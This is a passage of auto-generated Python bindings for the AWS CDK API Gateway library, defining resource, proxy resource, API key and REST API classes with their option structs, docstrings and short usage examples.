def add_proxy(self, *, any_method: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "ProxyResource":
"""Adds a greedy proxy resource ("{proxy+}") and an ANY method to this route.
:param options: -
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
options = ProxyResourceOptions(any_method=any_method, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
return jsii.invoke(self, "addProxy", [options])
@jsii.member(jsii_name="addResource")
def add_resource(self, path_part: str, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> "Resource":
"""Defines a new child resource where this resource is the parent.
:param path_part: -
:param options: -
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
options = ResourceOptions(default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
return jsii.invoke(self, "addResource", [path_part, options])
@jsii.member(jsii_name="getResource")
def get_resource(self, path_part: str) -> typing.Optional["IResource"]:
"""Retrieves a child resource by path part.
:param path_part: -
"""
return jsii.invoke(self, "getResource", [path_part])
@jsii.member(jsii_name="resourceForPath")
def resource_for_path(self, path: str) -> "Resource":
"""Gets or create all resources leading up to the specified path.
- Path may only start with "/" if this method is called on the root resource.
- All resources are created using default options.
:param path: -
"""
return jsii.invoke(self, "resourceForPath", [path])
@property
@jsii.member(jsii_name="path")
@abc.abstractmethod
def path(self) -> str:
"""The full path of this resuorce."""
...
@property
@jsii.member(jsii_name="resourceId")
@abc.abstractmethod
def resource_id(self) -> str:
"""The ID of the resource."""
...
@property
@jsii.member(jsii_name="restApi")
@abc.abstractmethod
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating its
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
...
@property
@jsii.member(jsii_name="url")
def url(self) -> str:
return jsii.get(self, "url")
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
@abc.abstractmethod
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
...
@property
@jsii.member(jsii_name="defaultIntegration")
@abc.abstractmethod
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
...
@property
@jsii.member(jsii_name="defaultMethodOptions")
@abc.abstractmethod
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
...
@property
@jsii.member(jsii_name="parentResource")
@abc.abstractmethod
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
...
class _ResourceBaseProxy(ResourceBase, jsii.proxy_for(aws_cdk.core.Resource)):
@property
@jsii.member(jsii_name="path")
def path(self) -> str:
"""The full path of this resuorce."""
return jsii.get(self, "path")
@property
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""The ID of the resource."""
return jsii.get(self, "resourceId")
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating its
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
return jsii.get(self, "defaultCorsPreflightOptions")
@property
@jsii.member(jsii_name="defaultIntegration")
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
return jsii.get(self, "defaultIntegration")
@property
@jsii.member(jsii_name="defaultMethodOptions")
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
return jsii.get(self, "defaultMethodOptions")
@property
@jsii.member(jsii_name="parentResource")
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
return jsii.get(self, "parentResource")
class Resource(ResourceBase, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Resource"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, parent: "IResource", path_part: str, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param parent: The parent resource of this resource. You can either pass another ``Resource`` object or a ``RestApi`` object here.
:param path_part: A path name for the resource.
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
props = ResourceProps(parent=parent, path_part=path_part, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(Resource, self, [scope, id, props])
@property
@jsii.member(jsii_name="path")
def path(self) -> str:
"""The full path of this resuorce."""
return jsii.get(self, "path")
@property
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""The ID of the resource."""
return jsii.get(self, "resourceId")
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is because the model
is being tracked by the top-level RestApi object for the purpose of calculating its
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
return jsii.get(self, "restApi")
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
return jsii.get(self, "defaultCorsPreflightOptions")
@property
@jsii.member(jsii_name="defaultIntegration")
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
return jsii.get(self, "defaultIntegration")
@property
@jsii.member(jsii_name="defaultMethodOptions")
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
return jsii.get(self, "defaultMethodOptions")
@property
@jsii.member(jsii_name="parentResource")
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
return jsii.get(self, "parentResource")
class ProxyResource(Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.ProxyResource"):
"""Defines a {proxy+} greedy resource and an ANY method on a route.
see
:see: https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-set-up-simple-proxy.html
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, parent: "IResource", any_method: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param parent: The parent resource of this resource. You can either pass another ``Resource`` object or a ``RestApi`` object here.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
props = ProxyResourceProps(parent=parent, any_method=any_method, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(ProxyResource, self, [scope, id, props])
@jsii.member(jsii_name="addMethod")
def add_method(self, http_method: str, integration: typing.Optional["Integration"]=None, *, api_key_required: typing.Optional[bool]=None, authorization_type: typing.Optional["AuthorizationType"]=None, authorizer: typing.Optional["IAuthorizer"]=None, method_responses: typing.Optional[typing.List["MethodResponse"]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Mapping[str,"IModel"]]=None, request_parameters: typing.Optional[typing.Mapping[str,bool]]=None, request_validator: typing.Optional["IRequestValidator"]=None) -> "Method":
"""Defines a new method for this resource.
:param http_method: -
:param integration: -
:param options: -
:param api_key_required: Indicates whether the method requires clients to submit a valid API key. Default: false
:param authorization_type: Method authorization. Default: None (open access)
:param authorizer: If ``authorizationType`` is ``Custom``, this specifies the ID of the method authorizer resource.
:param method_responses: The responses that can be sent to the client who calls the method. Default: None This property is not required, but if these are not supplied for a Lambda proxy integration, the Lambda function must return a value of the correct format in order for the integration response to be correctly mapped to a response to the client.
:param operation_name: A friendly operation name for the method. For example, you can assign the OperationName of ListPets for the GET /pets method.
:param request_models: The models that describe the data structure of the request payload. Specify request models as key-value pairs (string-to-string mapping), with a content type as the key and a Model resource name as the value
:param request_parameters: The request parameters that API Gateway accepts. Specify request parameters as key-value pairs (string-to-Boolean mapping), with a source as the key and a Boolean as the value. The Boolean specifies whether a parameter is required. A source must match the format method.request.location.name, where the location is querystring, path, or header, and name is a valid, unique parameter name. Default: None
:param request_validator: The ID of the associated request validator.
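Example (sketch; ``proxy`` is this resource and ``handler`` is a hypothetical Lambda function)::

    method = proxy.add_method("GET",
        apigateway.LambdaIntegration(handler),  # "handler" is assumed, defined elsewhere
        api_key_required=True,
        operation_name="GetItem")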
"""
options = MethodOptions(api_key_required=api_key_required, authorization_type=authorization_type, authorizer=authorizer, method_responses=method_responses, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, request_validator=request_validator)
return jsii.invoke(self, "addMethod", [http_method, integration, options])
@property
@jsii.member(jsii_name="anyMethod")
def any_method(self) -> typing.Optional["Method"]:
"""If ``props.anyMethod`` is ``true``, this will be the reference to the 'ANY' method associated with this proxy resource."""
return jsii.get(self, "anyMethod")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ResourceOptions", jsii_struct_bases=[], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions'})
class ResourceOptions():
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
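Example (sketch of how these options cascade to child resources; assumes an existing ``api``)::

    books = api.root.add_resource("books",
        default_cors_preflight_options=apigateway.CorsOptions(
            allow_origins=apigateway.Cors.ALL_ORIGINS))  # every child of "books" inherits this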
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ResourceOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ApiKeyProps", jsii_struct_bases=[ResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'api_key_name': 'apiKeyName', 'customer_id': 'customerId', 'description': 'description', 'enabled': 'enabled', 'generate_distinct_id': 'generateDistinctId', 'resources': 'resources'})
class ApiKeyProps(ResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, api_key_name: typing.Optional[str]=None, customer_id: typing.Optional[str]=None, description: typing.Optional[str]=None, enabled: typing.Optional[bool]=None, generate_distinct_id: typing.Optional[bool]=None, resources: typing.Optional[typing.List["RestApi"]]=None):
"""ApiKey Properties.
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param api_key_name: A name for the API key. If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the API key name. Default: automatically generated name
:param customer_id: An AWS Marketplace customer identifier to use when integrating with the AWS SaaS Marketplace. Default: none
:param description: A description of the purpose of the API key. Default: none
:param enabled: Indicates whether the API key can be used by clients. Default: true
:param generate_distinct_id: Specifies whether the key identifier is distinct from the created API key value. Default: false
:param resources: A list of resources this API key is associated with. Default: none
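Example (sketch of these props applied to an ``ApiKey`` construct; assumes an existing ``api``)::

    key = apigateway.ApiKey(self, "Key",
        api_key_name="my-api-key",  # hypothetical name
        enabled=True,
        resources=[api])  # associate the key with this API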
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if api_key_name is not None: self._values["api_key_name"] = api_key_name
if customer_id is not None: self._values["customer_id"] = customer_id
if description is not None: self._values["description"] = description
if enabled is not None: self._values["enabled"] = enabled
if generate_distinct_id is not None: self._values["generate_distinct_id"] = generate_distinct_id
if resources is not None: self._values["resources"] = resources
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def api_key_name(self) -> typing.Optional[str]:
"""A name for the API key.
If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the API key name.
default
:default: automatically generated name
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-name
"""
return self._values.get('api_key_name')
@property
def customer_id(self) -> typing.Optional[str]:
"""An AWS Marketplace customer identifier to use when integrating with the AWS SaaS Marketplace.
default
:default: none
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-customerid
"""
return self._values.get('customer_id')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of the API key.
default
:default: none
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-description
"""
return self._values.get('description')
@property
def enabled(self) -> typing.Optional[bool]:
"""Indicates whether the API key can be used by clients.
default
:default: true
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-enabled
"""
return self._values.get('enabled')
@property
def generate_distinct_id(self) -> typing.Optional[bool]:
"""Specifies whether the key identifier is distinct from the created API key value.
default
:default: false
link:
:link:: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-apikey.html#cfn-apigateway-apikey-generatedistinctid
"""
return self._values.get('generate_distinct_id')
@property
def resources(self) -> typing.Optional[typing.List["RestApi"]]:
"""A list of resources this api key is associated with.
default
:default: none
"""
return self._values.get('resources')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ApiKeyProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ProxyResourceOptions", jsii_struct_bases=[ResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'any_method': 'anyMethod'})
class ProxyResourceOptions(ResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, any_method: typing.Optional[bool]=None):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if any_method is not None: self._values["any_method"] = any_method
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def any_method(self) -> typing.Optional[bool]:
"""Adds an "ANY" method to this resource.
If set to ``false``, you will have to explicitly
add methods to this resource after it's created.
default
:default: true
"""
return self._values.get('any_method')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ProxyResourceOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ProxyResourceProps", jsii_struct_bases=[ProxyResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'any_method': 'anyMethod', 'parent': 'parent'})
class ProxyResourceProps(ProxyResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, any_method: typing.Optional[bool]=None, parent: "IResource"):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param any_method: Adds an "ANY" method to this resource. If set to ``false``, you will have to explicitly add methods to this resource after it's created. Default: true
:param parent: The parent resource of this resource. You can either pass another ``Resource`` object or a ``RestApi`` object here.
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
'parent': parent,
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if any_method is not None: self._values["any_method"] = any_method
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def any_method(self) -> typing.Optional[bool]:
"""Adds an "ANY" method to this resource.
If set to ``false``, you will have to explicitly
add methods to this resource after it's created.
default
:default: true
"""
return self._values.get('any_method')
@property
def parent(self) -> "IResource":
"""The parent resource of this resource.
You can either pass another
``Resource`` object or a ``RestApi`` object here.
"""
return self._values.get('parent')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ProxyResourceProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.ResourceProps", jsii_struct_bases=[ResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'parent': 'parent', 'path_part': 'pathPart'})
class ResourceProps(ResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, parent: "IResource", path_part: str):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param parent: The parent resource of this resource. You can either pass another ``Resource`` object or a ``RestApi`` object here.
:param path_part: A path name for the resource.
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
self._values = {
'parent': parent,
'path_part': path_part,
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def parent(self) -> "IResource":
"""The parent resource of this resource.
You can either pass another
``Resource`` object or a ``RestApi`` object here.
"""
return self._values.get('parent')
@property
def path_part(self) -> str:
"""A path name for the resource."""
return self._values.get('path_part')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ResourceProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(IRestApi)
class RestApi(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.RestApi"):
"""Represents a REST API in Amazon API Gateway.
Use ``addResource`` and ``addMethod`` to configure the API model.
By default, the API will automatically be deployed and accessible from a
public endpoint.
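Example (minimal sketch; ``list_books_handler`` is a hypothetical Lambda function)::

    api = apigateway.RestApi(self, "books-api")
    books = api.root.add_resource("books")
    books.add_method("GET", apigateway.LambdaIntegration(list_books_handler))  # "GET /books"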
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_key_source_type: typing.Optional["ApiKeySourceType"]=None, binary_media_types: typing.Optional[typing.List[str]]=None, clone_from: typing.Optional["IRestApi"]=None, cloud_watch_role: typing.Optional[bool]=None, deploy: typing.Optional[bool]=None, deploy_options: typing.Optional["StageOptions"]=None, description: typing.Optional[str]=None, domain_name: typing.Optional["DomainNameOptions"]=None, endpoint_export_name: typing.Optional[str]=None, endpoint_types: typing.Optional[typing.List["EndpointType"]]=None, fail_on_warnings: typing.Optional[bool]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, parameters: typing.Optional[typing.Mapping[str,str]]=None, policy: typing.Optional[aws_cdk.aws_iam.PolicyDocument]=None, rest_api_name: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param api_key_source_type: The source of the API key for metering requests according to a usage plan. Default: - Metering is disabled.
:param binary_media_types: The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream". Default: - RestApi supports only UTF-8-encoded text payloads.
:param clone_from: The ID of the API Gateway RestApi resource that you want to clone. Default: - None.
:param cloud_watch_role: Automatically configure an AWS CloudWatch role for API Gateway. Default: true
:param deploy: Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes. Since API Gateway deployments are immutable, when this option is enabled (the default), an AWS::ApiGateway::Deployment resource will automatically be created with a logical ID that hashes the API model (methods, resources and options). This means that when the model changes, the logical ID of this CloudFormation resource will change, and a new deployment will be created. If this is set, ``latestDeployment`` will refer to the ``Deployment`` object and ``deploymentStage`` will refer to a ``Stage`` that points to this deployment. To customize the stage options, use the ``deployOptions`` property. A CloudFormation Output will also be defined with the root URL endpoint of this REST API. Default: true
:param deploy_options: Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled. If ``deploy`` is disabled, this value cannot be set. Default: - Based on defaults of ``StageOptions``.
:param description: A description of the purpose of this API Gateway RestApi resource. Default: - No description.
:param domain_name: Configure a custom domain name and map it to this API. Default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
:param endpoint_export_name: Export name for the CfnOutput containing the API endpoint. Default: - when no export name is given, output will be created without export
:param endpoint_types: A list of the endpoint types of the API. Use this property when creating an API. Default: - No endpoint types.
:param fail_on_warnings: Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource. Default: false
:param minimum_compression_size: A nullable integer used to enable compression (with a non-negative size between 0 and 10485760 (10MB) bytes, inclusive) or to disable compression (when undefined) on an API. When compression is enabled, compression or decompression is not applied to the payload if the payload size is smaller than this value. Setting it to zero allows compression for any payload size. Default: - Compression is disabled.
:param parameters: Custom header parameters for the request. Default: - No parameters.
:param policy: A policy document that contains the permissions for this RestApi. Default: - No policy.
:param rest_api_name: A name for the API Gateway RestApi resource. Default: - ID of the RestApi construct.
:param retain_deployments: Retains old deployment resources when the API changes. This allows manually reverting stages to point to old deployments via the AWS Console. Default: false
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
